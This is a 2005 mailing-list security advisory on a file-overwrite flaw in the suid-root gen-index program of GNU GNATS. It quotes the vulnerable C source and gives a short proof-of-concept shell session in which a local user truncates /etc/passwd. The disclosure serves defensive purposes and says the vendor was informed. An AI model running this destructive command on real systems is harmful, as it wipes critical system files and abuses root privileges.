lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Wed Jul  6 16:08:34 2005
From: pi3ki31ny at wp.pl (Adam Zabrocki)
Subject: GNATS - gen-index

Name:                       GNATS - gen-index
Vendor URL:                 http://www.gnu.org/software/gnats
Author:                     Adam Zabrocki <pi3ki31ny@...pl>
Date:                       June 16, 2005

    Issue:


  GNATS - the GNU problem report management system allows 
attacker to overwrite
files with privileges suid root (when compiled from sources and 
there isn't in system
gnats user), where GNATS is installed.


    Description:


  GNATS stores all information about the problem reports at a 
central site, and enables
users to access this site by various means, including e-mail, 
WWW, and a network daemon.
New problem reports can be created, and existing reports can be 
queried and updated, by
most of these means.


    Details:

	
	Possible overwrite any files in system by gen-index 
program installed
	with GNATS.


  Local users, able to run gen-index (in some times when GNATS 
was compiled from sources
and in system don't exist gnats user and group) are able to 
overwrite any files in system.
  The problem lies in gen-index main() function, which don't 
check argument who was given
to program and in hard open and write there own data.

"gnats/gen-index.c"
int
main (int argc, char **argv)
{
  ...
  ...

    while ((optc = getopt_long (argc, argv, "o:hd:nVie",
                              long_options, (int *) 0)) != EOF)
    {
      switch (optc)
        {
        ...
        ...
        case 'o':
          file_name = optarg;
          break;

        case 'n':
          numeric_sorting = TRUE;
          break;
	...
	...
        }
    }

  ...
  ...

  if (file_name)
    output = fopen (file_name, "w+");
  if (output == (FILE *) NULL)
    {
      fprintf (stderr, "%s: can't write to %s: %s\n", 
program_name,
               optarg, strerror (errno));
      exit (3);
    }

  ...
  ...

  if (indexIsBinary (database))
    {
      char numFields = indexFieldCount (database);
      fwrite (&numFields, 1, 1, output);
    }

  ...
  ...
  if (numeric_sorting && num_entries > 0)
    {
      qsort (entries, num_entries, sizeof (Entry), entry_cmp);
      for (i = 0; i < num_entries; i++)
        {
          fwrite (entries[i].string, 1, entries[i].length, 
output);
        }
    }

  fclose (output);
  ...
  exit (0);
}


Function fopen() with argument "w+" open file for reading and 
writing.
The file is created if it does not exist, otherwise it is 
truncated.
So when gen-index have suid root privilages we can overwrite any 
files
in system.


    Exploit:


  We don't need to write any 31337 exploit. Simple PoC:

pi3@...kstar:~$ pwd
/home/pi3
pi3@...kstar:~$ ls -alh /etc/passwd
-rw-r--r--    1 root     root          795 May 19 
18:49 /etc/passwd
pi3@...kstar:~$ ls -alh /usr/local/libexec/gnats/gen-index
-r-sr-xr-x    1 root     root         465k Nov 21  
2004 /usr/local/libexec/gnats/gen-index*
pi3@...kstar:~$ /usr/local/libexec/gnats/gen-index -n -
o /etc/passwd
pi3@...kstar:~$ ls -alh /etc/passwd
-rw-r--r--    1 root     root            1 Jun 16 
17:34 /etc/passwd
pi3@...kstar:~$ cat /etc/passwd
pi3@...kstar:~$


GNATS 4.1.0 and 4.0 are confirmed vulnerable. Probably all 
previous versions are also vulnerable.

I have informed GNATS team.

--
pi3 (pi3ki31ny) - pi3ki31ny@...pl
http://www.pi3.int.pl


----------------------------------------------------
Uroda.wp.pl - Nowy, kobiecy serwis internetowy! - Teraz 
zawsze pod r?k?. W lipcu Joanna Brodzik - poznaj jej sekrety:
Kliknij: http://klik.wp.pl/?adr=www.uroda.wp.pl&sid=424


Powered by blists - more mailing lists